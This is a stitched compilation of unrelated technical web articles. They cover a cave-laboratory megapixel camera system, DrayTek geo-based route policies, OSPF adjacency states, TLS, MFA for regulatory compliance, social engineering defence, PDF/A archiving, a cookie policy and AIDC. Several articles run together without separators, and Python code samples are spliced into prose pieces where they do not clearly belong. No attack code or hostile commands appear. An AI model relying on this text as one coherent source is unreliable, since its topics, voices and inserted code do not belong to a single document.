The AV5105DN can also be used at lower megapixel resolutions for various frame rates up to full motion. The camera provides full-motion progressive-scan 1280 x 1024 video at 30fps, 1600 x 1200 video at 24fps or 2048 x 1536 at 15fps. Features include forensic zooming to zero-in and view the details of a recorded image, motion detection and image cropping. The camera's day/night version used at the Tular Cave Laboratory includes a motorized infrared (IR) cut filter for superior low light performance. The camera incorporates Arecont Vision's MegaVideo® image processing at 80 billion operations per second. The AV5105DN can output multiple image formats, allowing the simultaneous viewing of the full-resolution field-of-view and regions of interest for high-definition forensic zooming. Other components of the system include a universal power adapter, connection to a PC using a standard UTP cable, and a PC placed in the laboratory's control room running the AV100 software, serving as a video-image recorder and providing temporary storage. (Wireless transmission was ruled out because it could stress the electroreceptors in the Proteus sensory system). Every two or three days, the data is transferred (via an external hard drive) to a main hard-drive archive installed in a remote location. Illumination is provided by three or four IR LED illuminators of various intensities to expose the entire area equally. High absorption of IR light in the water requires higher illumination for deeper areas. When observing macroscopic details (such as hatching), the AV5105DN is mounted on the video port of a stereo microscope. Gregor Aljancic designed and installed the system. The laboratory plans to install the permanent system by the end of 2011, using five to eight cameras with 24/7 monitoring and tied into an Internet connection to the cave.
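Motion-triggered recording of the kind the AV100 software provides is commonly built on frame differencing: a new frame is stored only when it differs enough from the previous one. The sketch below is a generic illustration of that idea (not Arecont Vision's actual algorithm), using tiny grayscale frames represented as flat lists of pixel values.

```python
def mean_abs_diff(prev, curr):
    """Average absolute per-pixel difference between two equal-size frames."""
    return sum(abs(a - b) for a, b in zip(prev, curr)) / len(curr)

def record_on_motion(frames, threshold=5.0):
    """Return indices of frames that differ enough from their predecessor."""
    kept = []
    prev = None
    for i, frame in enumerate(frames):
        if prev is not None and mean_abs_diff(prev, frame) > threshold:
            kept.append(i)
        prev = frame
    return kept

static = [10] * 64               # an 8x8 frame of uniform gray
moving = [10] * 32 + [200] * 32  # the same frame with a bright moving region
frames = [static, static, moving, moving, static]
print(record_on_motion(frames))  # [2, 4] -- only the changed frames are kept
```

Runs of identical frames (a motionless Proteus) produce no recordings at all, which is exactly why the laboratory's archive stays manageable.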
Remote IR video monitoring via the Internet will minimize the potential negative impact on the animals due to factors such as human presence, noise and radiation from the electronic equipment. The change will also relocate the sensitive electronic equipment from the harsh cave environment to a remote location. A wireless access point will be installed at the entrance of the laboratory. From that point, data will pass throughout the lab on a wired network, with a Power-over-Ethernet (PoE) network switch providing power to each camera. After installation of an Internet connection, the server computer – including the PC and high-capacity hard drives to store additional data – will be moved to a remote facility of the Tular Cave Laboratory. Higher-resolution megapixel images provide more information and clearer details that were not possible with the poor quality of the previous analog system. The megapixel advantage becomes especially obvious when monitoring a large laboratory pool, which requires the camera to be farther away, with the lens set to a wide angle to cover the entire area. On the video, the animals appear “smaller,” but the megapixel camera still provides clear images and allows for digital zooming of moving animals. Advantages related to video management include the ability to precisely adjust the exposure settings using the AV100 software, an improvement over the analog system's limitation of adjusting only the iris and focus. Forensic zooming, the ability to enlarge a smaller section of a recorded video image and see additional details, is also an important tool both for online and offline viewing. Viewing videotapes using the previous analog system was time-consuming, and roughly 70 percent of the gathered video showed animals that were not active, representing a huge amount of useless data and a considerable unnecessary cost. Also, it was harder to find events.
Since 1998, the laboratory had digitized the video images and used an online video tracking software to analyze the behavior of Proteus. However, digitizing the video further eroded the quality. Also, the system was not efficient in low-light conditions and lacked the necessary detail when observing the whole pool. The use of a megapixel camera minimizes these challenges. The use of a digital system also reduces the cost of archiving data. Instead of recording on expensive video tapes, the transition to a hard-drive archive provides numerous options to optimize available storage capacity. In addition to the direct advantages of megapixel video (image quality, capacity to monitor details, motion detection, etc.), the cameras provide some indirect advantages. Incorporating up-to-date video monitoring technology into the research methodology raises the quality of the research and advances the position of the Tular Cave Laboratory in the scientific community. In addition to providing greater megapixel image quality, the use of remote accessibility will open new possibilities in science and education. To date, the Tular Virtual Lab is believed to have the first 24/7 video system, a tool introduced to the field of subterranean biology that monitors cave life. During a one month 24/7 monitoring test in January 2011, the Arecont Vision camera mounted above one of the laboratory pools captured a Proteus female laying eggs – an extremely rare event that happens only every 8 to 12 years in captivity. Even in the early stages before the system is fully operative, the value of megapixel imaging as a study tool has become obvious. The data collected by the Arecont Vision infrared cameras has already brought urgently needed international attention to the natural history and conservation of the endangered cave amphibian. Developing additional basic knowledge of Proteus lays the groundwork for a more relevant and effective conservation plan for the endangered species. 
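The economics of motion-based archiving are easy to estimate. The bitrate below is an assumption for illustration only (the case study does not state actual figures); the point is the ratio between continuous recording and motion-triggered recording when, as noted above, roughly 70 percent of the footage shows inactive animals.

```python
def storage_gb_per_day(bitrate_mbps, active_fraction=1.0):
    """Gigabytes of video produced per day at a given bitrate and duty cycle."""
    seconds = 24 * 3600
    megabits = bitrate_mbps * seconds * active_fraction
    return megabits / 8 / 1000  # Mb -> MB -> GB (decimal units)

BITRATE = 8.0  # assumed H.264 bitrate in Mbps for a 5 MP stream

continuous = storage_gb_per_day(BITRATE)                    # record everything
motion = storage_gb_per_day(BITRATE, active_fraction=0.3)   # ~70% inactive

print(round(continuous, 1))  # 86.4 GB/day
print(round(motion, 1))      # 25.9 GB/day
```

Whatever the true bitrate, discarding the inactive 70 percent cuts storage (and review time) to less than a third, which is the saving the laboratory reported over its tape-based workflow.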
Arecont Vision is the leading manufacturer of high-performance megapixel IP cameras and associated software. Arecont Vision products are made in the USA and feature low-cost massively parallel image processing architectures MegaVideo® and SurroundVideo® that represent a drastic departure from traditional analog and network camera designs. All-in-one products such as the MegaDome®, MegaView™ and D4F/D4S series provide installer friendly solutions. Compact JPEG and H.264 series of cameras address cost sensitive applications. These innovative technologies enable Arecont Vision to deliver multi-megapixel digital video at IP VGA camera price points.
Vigor routers can forward traffic through multiple outgoing interfaces, such as WAN, VPN, and LAN. A network administrator can create a Route Policy or Static Route to control the forwarding interface for specific traffic. Some websites and resources have geo-restrictions. For example, Netflix provides different content to users in different countries, the Costco website may offer different merchandise based on where customers live, BBC News only provides some video resources to IP addresses within the UK, and some online games only let players choose servers near their residences. To bypass these restrictions, we need to make our traffic go through a gateway in the specific country or location. Therefore, Vigor routers provide a Country Object in Route Policy so that traffic can be sent via the interface at a specific location. This note demonstrates how to set up a Route Policy to forward traffic to the UK through WAN1, and traffic to the US through a VPN tunnel. Note: DrayTek Router includes GeoLite2 data created by MaxMind, available from https://www.maxmind.com. 1. Create a Country Object: go to Objects Setting >> Country Object page. 2. Create a Route Policy: go to Routing >> Load-Balance/Route Policy page, then click an available index to edit the rule. 3. Similarly, repeat steps 1 and 2 to configure a route policy that sends traffic to the US via VPN. 4. To verify the settings, we can use traceroute. Assume that WAN1's gateway IP is 192.168.39.1, and the VPN remote gateway IP (LAN IP of the remote router in the US) is 192.168.92.1. Trace bbc.com in the UK, and the traffic will go through the WAN1 gateway: 192.168.39.1. Trace netflix.com in the US, and we see the traffic go through the VPN remote gateway: 192.168.92.1. Was this helpful?
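Conceptually, the country-based route policy is a two-step lookup: destination IP to country (via GeoIP data), then country to egress interface. The sketch below is a simplified model, not DrayTek's implementation; the prefixes are reserved documentation ranges standing in for real GeoLite2 data, and the interface names mirror the example above (WAN1 for UK traffic, a VPN tunnel for US traffic).

```python
import ipaddress

# Toy GeoIP table: documentation prefixes standing in for real country data.
COUNTRY_PREFIXES = {
    ipaddress.ip_network("203.0.113.0/24"): "UK",
    ipaddress.ip_network("198.51.100.0/24"): "US",
}

# Route policy: country -> outgoing interface, plus a default route.
POLICY = {"UK": "WAN1", "US": "VPN-to-US"}
DEFAULT_IFACE = "WAN2"

def egress_interface(dst_ip):
    """Pick the outgoing interface for a destination address."""
    addr = ipaddress.ip_address(dst_ip)
    for net, country in COUNTRY_PREFIXES.items():
        if addr in net:
            return POLICY.get(country, DEFAULT_IFACE)
    return DEFAULT_IFACE

print(egress_interface("203.0.113.7"))   # WAN1 (matches the UK rule)
print(egress_interface("198.51.100.9"))  # VPN-to-US (matches the US rule)
print(egress_interface("192.0.2.1"))     # WAN2 (no rule matched, default)
```

The traceroute verification in step 4 checks exactly this mapping: the first hop observed should be the gateway of whichever interface the policy selected.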
When a router undergoes the exchange protocol within OSPF, in what order does it pass through each state? The correct order is exstart state > exchange state > loading state > full state. When a router undergoes the exchange protocol within OSPF (Open Shortest Path First), it passes through four states: exstart state: In this state, the two routers trying to establish an adjacency negotiate a master/slave relationship based on their router IDs and exchange their initial sequence numbers. exchange state: In this state, the routers exchange database description packets (DBDs) that summarize their LSAs (Link State Advertisements). loading state: In this state, each router requests the LSAs it is missing, as learned from the DBD exchange, and begins receiving them. full state: In this state, the routers have exchanged all of their LSAs and hold identical OSPF link-state databases; the adjacency is complete and they can forward traffic through the network. So the order in which a router passes through the states during the OSPF exchange protocol is exstart > exchange > loading > full.
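The progression can be checked mechanically with a small model of the state machine. The full OSPF neighbor state machine has more states (Down, Init, 2-Way) before the exchange protocol begins; the sketch below covers only the four exchange-protocol states discussed here.

```python
# Allowed forward transitions for the OSPF exchange protocol.
NEXT_STATE = {
    "ExStart": "Exchange",   # master/slave negotiated, DBD exchange begins
    "Exchange": "Loading",   # DBD summaries swapped, missing LSAs requested
    "Loading": "Full",       # all requested LSAs received
    "Full": None,            # adjacency complete, databases synchronized
}

def exchange_sequence(start="ExStart"):
    """Walk the state machine from `start` to the terminal state."""
    path, state = [start], start
    while NEXT_STATE[state] is not None:
        state = NEXT_STATE[state]
        path.append(state)
    return path

print(exchange_sequence())  # ['ExStart', 'Exchange', 'Loading', 'Full']
```

Note that Exchange must precede Loading: a router can only request missing LSAs after the DBD exchange has told it which LSAs it lacks.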
Transport Layer Security (TLS) is a way to secure information as it is carried over the Internet: users browsing websites, emailing, instant messaging, and conversing via Voice over IP (VoIP). TLS is the successor to Secure Sockets Layer (SSL), and the security it provides is a cornerstone of the modern Internet. The goal of TLS is to provide a private and secure connection between a web browser and a website server. It does this with a cryptographic handshake between the two systems using public-key cryptography (PKC). The two parties to the connection agree on a shared secret, and once this secret is validated by each machine it is used to protect all subsequent communications. The connection then employs lighter symmetric cryptography, which saves bandwidth and processing power. Any remote connection to a website requires some form of communication, and communication relies on a transport mechanism. To achieve secure end-to-end communication, the transport layer must be encrypted; otherwise, data passing through it can be compromised. The potential to steal data carried this way is not only a privacy issue; it would also be a way to steal large amounts of sensitive information. "Without TLS protecting the connections between web sites and their users, the viability of the Internet would be in question. Sensitive information users input, such as PII and CHD, would be open to eavesdropping and theft, leading to mass instances of identity theft and financial fraud. There would be no trust in online services, and Internet adoption would have stalled."
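The handshake-then-symmetric pattern can be illustrated with a deliberately simplified Diffie-Hellman exchange followed by a keyed MAC. This is a toy, not real TLS: the private keys are small fixed numbers for determinism, there are no certificates, and no cipher negotiation. It only shows the shape of the idea: both sides derive the same secret using public-key techniques, then switch to cheaper symmetric operations.

```python
import hashlib
import hmac

# Public parameters (a Mersenne prime keeps the toy arithmetic simple).
P = 2**127 - 1
G = 3

# Fixed private keys for determinism -- a real handshake uses fresh randomness.
client_priv, server_priv = 271828, 314159

# Each side publishes g^priv mod p and combines the peer's value with its own key.
client_pub = pow(G, client_priv, P)
server_pub = pow(G, server_priv, P)
client_secret = pow(server_pub, client_priv, P)
server_secret = pow(client_pub, server_priv, P)
assert client_secret == server_secret  # both sides now hold the same secret

# Derive a symmetric key from the shared secret, then protect application data.
key = hashlib.sha256(client_secret.to_bytes(16, "big")).digest()
tag = hmac.new(key, b"GET / HTTP/1.1", hashlib.sha256).hexdigest()
print(len(tag))  # 64 hex characters of authentication tag
```

An eavesdropper sees only the public values; recovering the secret from them is the discrete-logarithm problem, which is what makes the subsequent symmetric traffic safe to trust.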
The fast-changing digital landscape creates an ever more complicated maze of regulations that businesses of all sizes must navigate. With multiple data privacy laws and industry-specific compliance standards in play, staying compliant can feel overwhelming. Multi-factor authentication (MFA) can contribute significantly to meeting these obligations. MFA is a security process that requires users to provide multiple forms of verification before accessing systems, applications, or accounts. By demanding more than just a username and password, MFA reduces the chances of unauthorized access and data breaches. These controls strengthen a business's standing as a security-minded organization capable of meeting the stringent conditions set by data protection regulators. MFA also serves as a visible demonstration of an organization's commitment to protecting customer data and business assets. In an era where data privacy and security weigh heavily on purchasing decisions, that commitment can determine a company's success and foster trust from clients and regulators alike. How MFA Assists Businesses Get and Stay Compliant With Regulations Regulatory compliance is not only about avoiding fines and penalties; it is a clear signal that an organization takes good data management and information security seriously. MFA plays a crucial role in this endeavor by: - Strengthening Access Controls: By requiring multiple forms of verification, MFA raises a barrier that is far harder for fraudsters to bypass, making unauthorized entry into your systems much less likely.
This aligns with the access-control requirements found in most compliance frameworks, including the General Data Protection Regulation (GDPR) and the Health Insurance Portability and Accountability Act (HIPAA). - Reducing the Risk of Data Breaches: Stolen credentials are a leading cause of data breaches, and MFA significantly reduces the likelihood that stolen credentials alone will grant access. Keeping sensitive information out of unauthorized hands is a key compliance requirement, and MFA adds exactly that barrier. - Demonstrating Security Best Practices: Deploying MFA signals that your company follows current security guidance for its industry. This can be a determining factor in satisfying the security and risk-management criteria in compliance regimes such as PCI DSS and SOX. - Improving Incident Response and Forensics: Should a security event occur, MFA can generate audit trails that speed up and improve investigation and response. Having data that demonstrates your organization's commitment to data protection and incident management is often essential during audits, where it is a key factor in evaluating compliance. The Importance of Data Protection Data protection is central to modern business models, not a matter for the IT department alone. In a digital world where data can be stolen or misused, companies must protect it rigorously in order to be regarded as trustworthy partners. Failing to safeguard data can bring serious consequences, including hefty fines, legal action, and reputational damage that may be hard to repair.
Beyond the loss of sensitive information itself, data breaches cause economic losses, workflow disruption, and an erosion of consumer trust. Businesses therefore need a holistic, forward-looking data protection strategy to safeguard their assets, stay competitive, and remain compliant. How MFA Can Fortify Data Security MFA is one of the most powerful instruments in the data protection arsenal, impeding unauthorized access and data breaches in a layered way. Rather than relying on passwords alone, MFA imposes additional verification such as biometric checks or one-time codes, so the risk of a successful attack drops significantly. Here's how MFA strengthens data protection: - Mitigating the Risks of Compromised Credentials: Login credentials are a prime target for cybercriminals. MFA addresses this directly: even if an attacker obtains a user's credentials, they cannot get in without the additional verification factor, such as a one-time code or hardware key. - Enhancing Access Control and Visibility: MFA gives you fine-grained control over who can reach critical data and infrastructure. You can define granular access policies based on user roles, device types, and other context, which also simplifies monitoring user activity and spotting suspicious behavior. - Improving Incident Response and Forensics: Should a security breakdown occur, MFA can provide forensic data that is valuable during the response and investigation process.
This information also helps demonstrate that your company meets the standards set by data protection laws and regulators, which auditors frequently look for. - Addressing Regulatory Requirements: Many data protection and privacy regulations, including GDPR, HIPAA, and PCI DSS, explicitly require MFA or other strong authentication methods to secure sensitive information. Implementing MFA helps your business satisfy these requirements and avoid heavy fines. Common Challenges and Misconceptions About MFA Despite MFA's evident benefits, many enterprises hesitate to adopt it because of perceived complexity and misconceptions. These factors must be addressed for an MFA rollout to succeed. - User Adoption and Resistance to Change: A new authentication process can meet resistance from employees accustomed to the traditional username-and-password approach. Good change-management practices and a user-friendly, easy-to-learn interface are the best ways to address this. - Integration Complexity: Integrating MFA with existing systems and applications can be complicated, and may require close collaboration between the IT team and vendors for the implementation to fully succeed. - Cost and Resource Constraints: MFA deployment carries costs, including staffing, which deserve careful consideration, particularly for small and medium-sized enterprises.
- MFA is Inconvenient: Contrary to the belief that MFA's extra step is a burden, modern MFA solutions are designed to be convenient and do not meaningfully interfere with productivity. - MFA is Only for Large Enterprises: Organizations of every size should adopt MFA; the damage from a data breach does not depend on company size. - MFA is Overkill for My Business: Data protection and the regulations around it matter to businesses of every kind, and MFA is an effective way to raise the security bar and meet those obligations. Addressing these challenges and misconceptions lays a strong foundation for a successful MFA rollout. Regulatory Compliance Requirements and Implementation of MFA Regulatory compliance strategies differ by industry and region, but often include employee training in cybersecurity basics and limiting exposure to phishing and malware. MFA can be the spearhead of this effort, demonstrating that your organization is serious about securing sensitive information. Here are some examples of how MFA helps address specific regulatory requirements: GDPR (General Data Protection Regulation): GDPR requires firms to implement appropriate technical and organizational measures to protect personal data. MFA is a natural way to meet GDPR's expectations for strong authentication and access control. HIPAA (Health Insurance Portability and Accountability Act): HIPAA requires healthcare organizations to implement access controls and auditing to safeguard electronic protected health information (ePHI). MFA is a fundamental part of meeting those requirements.
PCI DSS (Payment Card Industry Data Security Standard): PCI DSS requires multi-factor authentication as one of the key controls for keeping cardholder data safe. NIST (National Institute of Standards and Technology) Cybersecurity Framework: The NIST Cybersecurity Framework identifies MFA as a best practice in identity and access management, a key part of the framework's "Protect" function. Deploying MFA within your organization calls for a focused, methodical, and largely holistic and strategic approach. This includes: - Conducting a thorough assessment of your existing security posture and compliance requirements: Identify the specific statutes and standards that apply to your business, and determine how MFA can help you satisfy them. - Selecting the right MFA solution: Choose a vendor that offers a complete, user-friendly MFA solution that integrates with your existing systems and security infrastructure. - Developing a robust implementation plan: Create a comprehensive plan for rolling out MFA across the whole organization, covering user training, change management, and monitoring and maintenance routines. - Continuously reviewing and updating your MFA strategy: Regularly assess the effectiveness of your MFA implementation and adjust it as needed to maintain compliance and data protection. A systematic, phased approach to MFA implementation not only reinforces your regulatory compliance but also strengthens the security of your business data and your customers' trust. As data continues to evolve in the digital era, robust data protection and regulatory compliance have an integral role to play.
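The compliance mappings above don't tie you to one particular second factor, but time-based one-time passwords (TOTP, standardized in RFC 6238) are among the most common. The following is a minimal, illustrative Python sketch of the algorithm (HMAC-SHA1, 30-second steps), not any vendor's implementation; function names are our own:

```python
import base64
import hashlib
import hmac
import struct
import time


def totp(secret_b32, at=None, digits=6, step=30):
    """Derive a time-based one-time password (RFC 6238, HMAC-SHA1)."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((time.time() if at is None else at) // step)
    msg = struct.pack(">Q", counter)               # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                     # dynamic truncation (RFC 4226)
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF)
    return str(code % (10 ** digits)).zfill(digits)


def verify(secret_b32, submitted, at=None, window=1, step=30):
    """Accept codes from adjacent time steps to tolerate small clock drift."""
    now = time.time() if at is None else at
    return any(
        hmac.compare_digest(totp(secret_b32, now + k * step), submitted)
        for k in range(-window, window + 1)
    )
```

The `window` parameter is the usual trade-off between usability (tolerating drift between the server and the user's authenticator app) and the size of the acceptance window an attacker could exploit.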
Facing the compliance challenges imposed by different regulations, Multi-Factor Authentication is a highly effective tool that can truly fortify your security posture and demonstrate your accountability for proper data management. By adopting MFA you improve your access controls, diminish the possibility of a data breach, and comply with the requirements established by data protection law. In addition, MFA serves as hard evidence of your organization's reliability in safeguarding sensitive data, building trust with both your clients and the relevant authorities. As you work to reinforce regulatory compliance and data protection, remember that MFA is not just a security measure but a strategic investment in your organization's continuity and effectiveness. Today's world is unpredictable and rife with growing compliance obligations, but with the power of MFA you can tackle these challenges with confidence and secure sustainable growth and success for your organization.
<urn:uuid:bf367ee3-dc6b-43dc-90b4-53b205a693cd>
CC-MAIN-2024-38
https://blog.avatier.com/the-role-of-mfa-in-regulatory-compliance-and-data-protection/
2024-09-17T22:10:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.53/warc/CC-MAIN-20240917204739-20240917234739-00332.warc.gz
en
0.937026
2,347
2.546875
3
Protecting Your Users from Social Engineering When it comes to information security, the weakest link might be something that no amount of software code and encryption can fully protect - your users. Social engineering is the practice of manipulating people into disclosing information that can help an attacker gain unauthorized access to your data (the Jimmy Kimmel Live show recently demonstrated a hilarious example of this). As intelligent as people are, they are also governed by factors such as fear, anxiety, empathy, bias, pride and a desire to help - all of which can be used to an attacker's advantage. When exploring how social engineers work, it's clear how insidious an attack can be. Attackers often only need very small pieces of information, which are individually harmless. In 2012, a writer for wired.com reported that a hacker was able to take over his digital life and gain access to his Google, Twitter and AppleID accounts. In his case, the last four digits of his credit card number, which were discovered from his Amazon account, were the same digits that Apple accepted for identity verification. In another case, the owner of the $50,000 @N Twitter handle, Naoki Hiroshima, was forced to give it up when an attacker used social engineering techniques to take Naoki's GoDaddy account hostage. Despite the name sounding like one of the coolest professions to be in, social engineering is a real problem for businesses. According to a 2011 study by Check Point Software Technologies, almost half of the companies surveyed had experienced over 25 social engineering attacks in the two years prior and many cited an average incident cost exceeding $100,000. Most social engineers are motivated by financial gain, but revenge is also a factor.
New employees, contractors and executive assistants are the most susceptible to social engineering attacks. Every year, the DEF CON Hacking conference holds a competition to surface the most effective social engineering techniques to answer one question - how do we protect against social engineering? Due to the covert and unpredictable nature of social engineering, it's imperative to assume you have been and always will be a victim of social engineering attacks. Prevention involves having and enforcing strict policies to restrict access to information and physical on-premises resources, and educating users about how to identify an attack. Multiple points of identity verification (i.e., using an outbound phone call to confirm the identity of a user) are also key to ensuring that privileged information is shared with the correct person. Finally, if an attacker does gain access to a system, it's imperative that administrators can contain damages by revoking access to accounts and remotely wiping data from devices where possible. Egnyte has partnered with Duo Security to offer a robust Two-Step Login Verification system, which IT admins can use to enforce identity verification to prevent social engineering. Egnyte also offers advanced authentication and a device control suite that allows admins to lock out user accounts and remotely wipe data on devices to mitigate the damage of unauthorized access.
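The "multiple points of identity verification" idea can be sketched as a small helper that issues short-lived one-time codes, delivered over a second channel (an outbound phone call, for instance), which the caller must read back before privileged information is shared. This is an illustrative Python sketch with hypothetical names, not Duo's or Egnyte's actual API:

```python
import secrets
import time


class VerificationCodes:
    """Issue and check short-lived one-time codes for out-of-band
    identity confirmation. All names here are illustrative."""

    def __init__(self, ttl_seconds=300):
        self.ttl = ttl_seconds
        self._pending = {}  # user_id -> (code, expiry timestamp)

    def issue(self, user_id, now=None):
        now = time.time() if now is None else now
        code = f"{secrets.randbelow(10 ** 6):06d}"   # 6-digit random code
        self._pending[user_id] = (code, now + self.ttl)
        return code  # in practice, sent via the out-of-band channel

    def verify(self, user_id, submitted, now=None):
        now = time.time() if now is None else now
        code, expires_at = self._pending.pop(user_id, (None, 0.0))
        # One-time use: the pop above consumes the code either way.
        return (code is not None
                and now <= expires_at
                and secrets.compare_digest(code, submitted))
```

Two properties matter here: codes expire quickly (limiting the window for a social engineer who overhears one), and each code is consumed on first use whether or not it matches.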
<urn:uuid:ba65b38d-b412-474a-b881-9c9072aaca40>
CC-MAIN-2024-38
https://www.egnyte.com/blog/post/protecting-your-users-from-social-engineering
2024-09-13T02:25:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00832.warc.gz
en
0.951356
653
2.515625
3
A PDF/A is a special kind of PDF that ensures the visual appearance of a document remains the same, regardless of what hard- or software is used. All the information needed to display the document and its elements (think fonts, images, color information) is embedded in the file. This means the client records will remain readable even if the hard- or software used to access the private documents changes. How PDF/A is different from PDF - PDF/A is meant for preserving documents that can be restored when needed. A PDF can’t preserve documents. - PDF/A does not allow audio, video, and executable content, while PDF does. - PDF/A requires that graphics and fonts be embedded into the file, while PDF does not. This ensures that a user of a PDF/A does not need the same fonts that were used to create the original file installed on their computer to read the file. - PDF/A does not allow external content references, while PDF does. - PDF/A does not allow encryption, while PDF does. After reading this list, you might be thinking: Geez, what’s a PDF/A good for? It turns out it’s good for a lot. The Benefits of PDF/A As previously mentioned, PDF/A’s main draw is the long-term storage of digital information. This is especially useful for the financial service industry in which client information must be properly stored and destroyed. PDF/A is ISO-standardized in contrast to a PDF. It must meet certain requirements so that years from now, the look of the original file remains the same. This is especially important should a legal dispute arise. You can be confident that you can rely on PDF/A documents and that they have not been altered. You can search PDF/A documents, saving you time and money. PDF/A is a great option for digitally signed documents and records. Digital signatures recorded in the PDF/A file can be enforceable by law. PDF/A makes it easy to reuse content. The files can be easily converted to Word, HTML, or eBook formats. 
Using this document preservation tool will keep sensitive client records and other private information safe, accessible, and easy to search. The format can also be used for scanned documents. If your organization needs help making documents PDF/A compliant, Higher Information Group’s document conversion team can help.
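For organizations converting files in-house, one widely used tool is Ghostscript's `pdfwrite` device, which can rewrite an ordinary PDF toward PDF/A. The sketch below builds the documented command line from Python; it assumes the `gs` binary is installed, and full PDF/A conformance in practice also involves an ICC output profile and a validation step, so treat this as a starting point rather than a complete compliance workflow:

```python
import shutil
import subprocess


def pdfa_convert_command(src, dst, part=2):
    """Build a Ghostscript invocation that rewrites `src` as PDF/A-{part}.
    Flags follow Ghostscript's documented pdfwrite / PDF/A options."""
    return [
        "gs",
        f"-dPDFA={part}",                 # target PDF/A part (1, 2 or 3)
        "-dBATCH", "-dNOPAUSE",
        "-sDEVICE=pdfwrite",
        "-dPDFACompatibilityPolicy=1",    # discard constructs PDF/A forbids
        "-sColorConversionStrategy=RGB",
        f"-sOutputFile={dst}",
        src,
    ]


def convert_to_pdfa(src, dst, part=2):
    """Run the conversion; raises if Ghostscript is not on PATH."""
    if shutil.which("gs") is None:
        raise RuntimeError("Ghostscript (gs) not found on PATH")
    subprocess.run(pdfa_convert_command(src, dst, part), check=True)
```

After conversion, a PDF/A validator (such as the industry's open-source veraPDF) is the usual way to confirm the output actually conforms.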
<urn:uuid:ccd67e20-43c4-45b4-93ca-56d03673d761>
CC-MAIN-2024-38
https://higherinfogroup.com/what-is-a-pdf-a-and-why-should-financial-offices-care/
2024-09-20T13:34:19Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652278.82/warc/CC-MAIN-20240920122604-20240920152604-00232.warc.gz
en
0.886013
506
2.671875
3
Updated March 8, 2023 1. What are cookies? A cookie is a small text file, web beacon, or similar technology that a website saves on your computer or mobile device when you visit the site. A cookie may be temporary and expire at the end of your browsing session or remain in the cookie file of your browser after you leave the website. For example, it enables the website to remember your actions and preferences (such as login, language, font size and other display preferences) over a period of time, so you don’t have to keep re-entering them whenever you come back to the site or browse from one page to another. Remembering your preferences with respect to the website, related products, services, or language. To enable content or services on the website for you Remembering your previous use of the website and gathering usage data (for instance, to be used for improving the website or marketing). Where relevant, cookies may allow us to remember your user ID so that you do not have to input it every time you visit our websites. 3. How to control cookies You can control and/or delete cookies as you wish – for details, see aboutcookies.org. You can delete all cookies that are already on your computer and you can set most browsers to prevent them from being placed. If you do this, however, you may have to manually adjust some preferences every time you visit a site and some services and functionalities may not work. You should be aware that disabling cookies may affect the appearance of our websites on your computer, tablet, or device. In particular, it may prevent access to any secure areas of our websites, where relevant. Disabling cookies may prevent the use of portions of our website or prevent certain parts of our website from functioning correctly. 4. Third party sites
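To make the distinction between temporary (session) cookies and persistent ones concrete, here is a short sketch using Python's standard `http.cookies` module to build the `Set-Cookie` headers a server would send; the cookie names are illustrative only:

```python
from http.cookies import SimpleCookie

# A session cookie: no Expires/Max-Age attribute, so the browser
# discards it when the browsing session ends.
session = SimpleCookie()
session["lang"] = "en"

# A persistent cookie: Max-Age keeps it in the browser's cookie file
# after the session ends -- here, a display preference kept for 30 days.
persistent = SimpleCookie()
persistent["font_size"] = "large"
persistent["font_size"]["max-age"] = 60 * 60 * 24 * 30
persistent["font_size"]["path"] = "/"

# A server "deletes" a cookie by resending it with Max-Age=0 (or an
# Expires date in the past), which tells the browser to discard it.
removal = SimpleCookie()
removal["font_size"] = ""
removal["font_size"]["max-age"] = 0
```

Browser-side controls (as described above) work independently of these headers: the user can delete or block any of these cookies regardless of what the server sets.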
<urn:uuid:48dc9ad3-7817-44eb-b04e-9181ad5f5ebc>
CC-MAIN-2024-38
https://www.innovativesystems.com/cookie-policy/
2024-09-12T02:06:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00132.warc.gz
en
0.926043
377
2.546875
3
Automatic Identification and Data Collection (AIDC) is a technological model that automates the process of identifying objects, entities, or transactions and gathering their related data. Organizations can use AIDC technologies like barcodes, biometrics, and voice recognition to streamline the data collection process and eliminate the need for labor-intensive and often unsecure manual data entry. This article explains how AIDC works and how firms across various industries are using it to automate their data identification and collection efforts. What is Automatic Identification and Data Collection (AIDC)? Automatic identification and data collection—sometimes also referred to as automatic identification and data capture—is a category of related technologies used to collect data without manual intervention. Data can be collected from an individual person or from an object, image, or sound, among other things. From unlocking your phone to scanning groceries at the self-checkout aisle, chances are you interact with AIDC technologies every day. Consider some of the most common applications of AIDC technology and how often you encounter them: - Barcodes and QR codes - Magnetic stripes (credit cards, hotel key cards) - RFID chips - Biometrics (fingerprint scanners, facial recognition) The use of AIDC technology can enhance efficiency and security and improve the accuracy and reliability of collected information. Many organizations use AIDC in an extensive array of applications, from inventory management to product tracking to secure access and ID control to interactive product marketing. How Does AIDC Work? AIDC works by orchestrating a series of technologies—hardware, software, and communication protocols—to create a seamless flow of data identification and collection processes. These processes are carried out in several stages. 
Data Encoding and Capture Many AIDC use cases start with users interacting directly with a device to scan a QR code or undergo a biometric scan—for example, when logging securely into a PC or operating system. This might be for accessing product information or gaining secure access to physical spaces or digital platforms. In all scenarios, AIDC starts with encoding relevant information into a specific data format for processing. This can take the form of barcodes and biometric identifiers or similar encoding formats such as quick response (QR) codes and radio frequency identification (RFID) chips like those found in toll booth transponders. The encoded data encapsulates various attributes like user authentication credentials, product details, manufacturing dates, pricing, or geographical location. Specialized devices designed to capture the encoded data from physical objects or entities are then used to read the data. Data Transmission and Processing Captured AIDC data is then sent to a designated system or server for real-time data processing over a wired connection such as USB and ethernet, or using wireless technologies like WiFi, Bluetooth, and cellular networks. Once transmitted, the collected data undergoes various processing activities, typically data validation, analysis, transformation, and integration into overarching enterprise systems like customer relationship management (CRM) systems or business intelligence (BI) platforms. This crucial phase converts raw data from the field into actionable insights for guiding strategic decision-making processes. What is AIDC Used For? Due to its general automation benefits and adaptability to specific industries and use cases, AIDC has become a staple in a wide range of applications and industries, from retail and logistics to healthcare and finance. Here are some of the most common enterprise applications for AIDC.
